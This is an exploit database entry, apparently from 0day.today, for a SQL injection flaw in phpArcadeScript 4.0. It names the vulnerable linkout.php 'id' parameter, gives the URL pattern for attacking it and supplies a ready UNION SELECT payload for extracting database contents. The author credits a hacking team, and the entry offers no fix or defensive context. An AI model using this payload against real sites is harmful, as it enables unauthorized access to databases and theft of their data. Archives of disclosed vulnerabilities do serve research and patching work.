phpArcadeScript 4.0 (linkout.php id) SQL Injection Vulnerability

2009-07-28T00:00:00
ID 1337DAY-ID-5568
Type zdt
Reporter MizoZ
Modified 2009-07-28T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ================================================================
phpArcadeScript 4.0 (linkout.php id) SQL Injection Vulnerability
================================================================


----------------------------------------------------------------------------------------------------
  Name : PHP AS v4
  Site : http://www.phparcadescript.com/

----------------------------------------------------------------------------------------------------
 
  Found By : MizoZ [EvilWay Team]
  Made in  : Morocco
  Contact  : mizoz[at]9[dot]cn
  Greetz   : Moudi , Zuka , JIKO , opt!x , All friends
  Website : BlackArea.org (Coming Soon)
----------------------------------------------------------------------------------------------------

SQL Injection linkout.php (GET : id) :
[HOST]/[PATH]/linkout.php?id=[SQL CODE]

SQL CODE : null+union+select+1,2,3,4,5,6,7,8,9,10,11--

----------------------------------------------------------------------------------------------------



#  0day.today [2018-01-01]  #